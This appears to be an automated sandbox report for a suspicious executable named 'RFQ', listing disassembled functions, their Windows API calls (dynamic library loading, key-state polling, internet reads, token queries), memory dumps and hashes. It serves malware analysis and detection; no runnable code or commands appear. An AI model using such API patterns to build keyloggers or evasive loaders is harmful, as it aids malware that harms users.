                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: 116b3298061fc7ec60128f109f250502ca1eeee19261e3d5452d5d1ed9481f4e
                                                                            • Instruction ID: 1a6b83f043d726a34c7437310002c1e5a6f7b7c50c96f8a3cfeca875043aa939
                                                                            • Opcode Fuzzy Hash: 116b3298061fc7ec60128f109f250502ca1eeee19261e3d5452d5d1ed9481f4e
                                                                            • Instruction Fuzzy Hash: 85512C75A002199FCB15EF54C885AA9BBF6FF48314F04C098E949AB3A2CB75ED41CB94
                                                                            Function 00708E0B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00708E67
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00708EF7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00708F13
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00708F59
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00708F79
                                                                              • Part of subcall function 0069F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,006F0F61,?,753CE610), ref: 0069F7C5
                                                                              • Part of subcall function 0069F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006DF94D,00000000,00000000,?,?,006F0F61,?,753CE610,?,006DF94D), ref: 0069F7EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 666041331-0
                                                                            • Opcode ID: 1cd4d49449b7452f69722d6efbad8f37ec7d0d583c3b4f5e386b737cf2d0dbf1
                                                                            • Instruction ID: 8392f518ab5201d03c388304627ba1e6f2fcee0b1cb4df0b1fe2c0a1c6bef8a1
                                                                            • Opcode Fuzzy Hash: 1cd4d49449b7452f69722d6efbad8f37ec7d0d583c3b4f5e386b737cf2d0dbf1
                                                                            • Instruction Fuzzy Hash: 24514A74600205DFCB51EF68C494C99BBF2FF09324B0582A8E9569F3A2CB35ED85CB91
                                                                            Function 00716A44 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00716B01
                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00716B18
                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00716B41
                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,006FAA97,00000000,00000000), ref: 00716B66
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00716B95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MessageSendShow
                                                                            • String ID:
                                                                            • API String ID: 3688381893-0
                                                                            • Opcode ID: 6541ec28cf6c07963ae265b428d777a1d4d22034679cde925508c24e170979a9
                                                                            • Instruction ID: 8809e2bafc5bb16469bf778d2ee5e610e2b5ce5238426ccc66cd55bca7e9fb0f
                                                                            • Opcode Fuzzy Hash: 6541ec28cf6c07963ae265b428d777a1d4d22034679cde925508c24e170979a9
                                                                            • Instruction Fuzzy Hash: 8841AD75A04204AFD7259F6CCC58FE97BA5EB0A360F258264F919E72E0C778ED81CA44
                                                                            Function 0069EA9A Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 0069EAAE
                                                                            • ScreenToClient.USER32(?,?), ref: 0069EACB
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 0069EB02
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0069EB1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 203d05df815cfa8bea799a25901730897045dbe40d6d0c6c07ba56b53939da34
                                                                            • Instruction ID: 154aec544e70ea4003ec86db55a97c4f4b83fcabfe869697a22480a07387b934
                                                                            • Opcode Fuzzy Hash: 203d05df815cfa8bea799a25901730897045dbe40d6d0c6c07ba56b53939da34
                                                                            • Instruction Fuzzy Hash: 05415E71A0851AFFDF15EFA8C844BEEB776FB05320F20821AE425A72D0D7366954CB61
                                                                            Function 006F3792 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetInputState.USER32 ref: 006F37E9
                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 006F3840
                                                                            • TranslateMessage.USER32(?), ref: 006F3869
                                                                            • DispatchMessageW.USER32(?), ref: 006F3873
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F3884
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                            • String ID:
                                                                            • API String ID: 2256411358-0
                                                                            • Opcode ID: 87af81ec8ccebc98f1b0dbb804a4ee8b09492454085b8dd2582f209f6f7895db
                                                                            • Instruction ID: 2ba6e38ef9fb344cb5d961d3eec7cf43743fbdf8b0c54d6329149c25f29455c5
                                                                            • Opcode Fuzzy Hash: 87af81ec8ccebc98f1b0dbb804a4ee8b09492454085b8dd2582f209f6f7895db
                                                                            • Instruction Fuzzy Hash: CC31D6B05043599EEB25DB74D809BF23BAAAB01346F04846DE672C33D0E3ADA685CB15
                                                                            Function 006FCE38 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCE56
                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 006FCE8D
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,006FC13C,00000000), ref: 006FCED2
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCEE6
                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,006FC13C,00000000), ref: 006FCF10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                            • String ID:
                                                                            • API String ID: 3191363074-0
                                                                            • Opcode ID: aa1e4b1503493c2924945d6a9eccd3971e27d2f3abb64e6d3da900ede9412845
                                                                            • Instruction ID: 6536b4b5f31c87854b3e1c5044beebb8baa512759f9a1d9f20a3bed4722d0dce
                                                                            • Opcode Fuzzy Hash: aa1e4b1503493c2924945d6a9eccd3971e27d2f3abb64e6d3da900ede9412845
                                                                            • Instruction Fuzzy Hash: 87312C7150020DAFDB20DFA5D984AFBBBFAEF15364B10842EE606D3281D734AE459B64
                                                                            Function 006E1845 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 006E1859
                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 006E1905
                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 006E190D
                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 006E191E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 006E1926
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: f8efd6a87f704a7096aa54d770483d769de8d682a150dc1f700c26c15100a90b
                                                                            • Instruction ID: 87aba6beaf9e035b29aae50231bfa810ba9f753b0006e5fa55aa694c4e775a71
                                                                            • Opcode Fuzzy Hash: f8efd6a87f704a7096aa54d770483d769de8d682a150dc1f700c26c15100a90b
                                                                            • Instruction Fuzzy Hash: 1331C271900359EFDB14CFA9CC89ADE3BB6EB05315F108229F921AB2D1C7709D54EB90
                                                                            Function 0071563B Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 0071567A
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 007156D2
                                                                            • _wcslen.LIBCMT ref: 007156E4
                                                                            • _wcslen.LIBCMT ref: 007156EF
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0071574B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen
                                                                            • String ID:
                                                                            • API String ID: 763830540-0
                                                                            • Opcode ID: c0c6ced3decbd7e8840ca4515b3f8e31a38efc539d5ca5c07f689f7a2aff5e57
                                                                            • Instruction ID: 1080fbf795e40b885a2dac0894699b57fe1bcbdd9b50fa7b665ab1db95fe40f6
                                                                            • Opcode Fuzzy Hash: c0c6ced3decbd7e8840ca4515b3f8e31a38efc539d5ca5c07f689f7a2aff5e57
                                                                            • Instruction Fuzzy Hash: E3218171900608DADB259F98CC44AEDB7B8EF41764F10825AE929EB1C0D7B8D9C5CF50
                                                                            Function 00700857 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00700878
                                                                            • GetForegroundWindow.USER32 ref: 0070088F
                                                                            • GetDC.USER32(00000000), ref: 007008CB
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 007008D7
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 0070090F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 3f6c95e0b0c0037c86fb83d7fd15da619086faab9db35ce3e5ac82f335343b92
                                                                            • Instruction ID: 9359fb4208118dfb48ebdbf25e8d4f1545e7d69211a0f3c3f15984da39796081
                                                                            • Opcode Fuzzy Hash: 3f6c95e0b0c0037c86fb83d7fd15da619086faab9db35ce3e5ac82f335343b92
                                                                            • Instruction Fuzzy Hash: 95216F75600214EFD704EFA9C888AAA77F6FF48750F04C42CE54697791DA74AC00CB94
                                                                            Function 006BCD5D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 006BCD66
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006BCD89
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006BCDAF
                                                                            • _free.LIBCMT ref: 006BCDC2
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006BCDD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: 0b625a6fded223cff1d82c505a051e6671f020ab15a20ef101723ede47183980
                                                                            • Instruction ID: 175bd5b74f394f635a837edaa91736ae5ca2019faadf7e284405ceef8bf623d0
                                                                            • Opcode Fuzzy Hash: 0b625a6fded223cff1d82c505a051e6671f020ab15a20ef101723ede47183980
                                                                            • Instruction Fuzzy Hash: CC01B1FA6412157FA72216AA5C88CFB6E6EDEC2B713148139B904C6340DE648E42D3B4
                                                                            Function 0069AABF Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
                                                                            • SelectObject.GDI32(?,00000000), ref: 0069AB28
                                                                            • BeginPath.GDI32(?), ref: 0069AB3F
                                                                            • SelectObject.GDI32(?,00000000), ref: 0069AB68
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 74fe0ffe5d94fcb341d8d7a3dd6185924f075e85d9ea6aa1f356b07bab0c99f5
                                                                            • Instruction ID: 421ca28c7318c4e8cbf59f5cbba836f546b3781e354db1771924713c12b50ee3
                                                                            • Opcode Fuzzy Hash: 74fe0ffe5d94fcb341d8d7a3dd6185924f075e85d9ea6aa1f356b07bab0c99f5
                                                                            • Instruction Fuzzy Hash: F921A170801384EBDF118FA8DD14BE97BABFB01327F50C216F411966E4D3B8A851CB99
                                                                            Function 006B2D88 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,006AF26E,006B37F3,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C), ref: 006B2D8D
                                                                            • _free.LIBCMT ref: 006B2DC2
                                                                            • _free.LIBCMT ref: 006B2DE9
                                                                            • SetLastError.KERNEL32(00000000), ref: 006B2DF6
                                                                            • SetLastError.KERNEL32(00000000), ref: 006B2DFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 6901e64cd0a4f995ac65bc9f325e8895778fe81809eb4c71bae79d3a6534dbb2
                                                                            • Instruction ID: 9c2cf12777cdd6275388a0f241f05a8528068c61e8cd64c9948cfcb2a2002e74
                                                                            • Opcode Fuzzy Hash: 6901e64cd0a4f995ac65bc9f325e8895778fe81809eb4c71bae79d3a6534dbb2
                                                                            • Instruction Fuzzy Hash: B101FEF624171367C21227795C56DE716DFEFC6761720841DF425A23D2DF2888C35368
                                                                            Function 006EE899 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 006EE8B5
                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 006EE8C3
                                                                            • Sleep.KERNEL32(00000000), ref: 006EE8CB
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 006EE8D5
                                                                            • Sleep.KERNEL32 ref: 006EE911
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: ab213b3971a054bf1a054b733b86352c594644628c965c6ed1ed08a31288aa92
                                                                            • Instruction ID: a567734804847a35dd1ed9af5fc416cafcfddf64f93a00274b39623b254cb292
                                                                            • Opcode Fuzzy Hash: ab213b3971a054bf1a054b733b86352c594644628c965c6ed1ed08a31288aa92
                                                                            • Instruction Fuzzy Hash: 6C016D71D4161DEBCF00AFE9DC59AEDBBB9FB09301F018456D501B2281CB359A54C765
                                                                            Function 006E103D Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: 558cef6cea75f22fd77e3d811b83dca98122e123a3c2582ca72bc99ea62f7aa9
                                                                            • Instruction ID: 9e14988b39c910f4e7f00bc74aeeb026d24f2911741a601b3e945f7dd1d41670
                                                                            • Opcode Fuzzy Hash: 558cef6cea75f22fd77e3d811b83dca98122e123a3c2582ca72bc99ea62f7aa9
                                                                            • Instruction Fuzzy Hash: 630181B9140305BFDB124FA9DC59DAB3B6EFF8A360B108414F945C7390DB75DC409A60
                                                                            Function 006E0EF8 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E0F0E
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E0F1A
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E0F29
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E0F30
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E0F46
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 8277acf077ba2b5389038a3abf6cdc8e01406325ad406615dc7051d44a9f67f5
                                                                            • Instruction ID: ebefbe502735dbb0176a086b293218f2ee69120b957da8b21e011066b1cb58d6
                                                                            • Opcode Fuzzy Hash: 8277acf077ba2b5389038a3abf6cdc8e01406325ad406615dc7051d44a9f67f5
                                                                            • Instruction Fuzzy Hash: 1DF0AF75280305BBDB220FE99C49F963B6EEF89760F118410FD09C6290CA74DC508A60
                                                                            Function 006E0F58 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E0F6E
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F7A
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F89
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F90
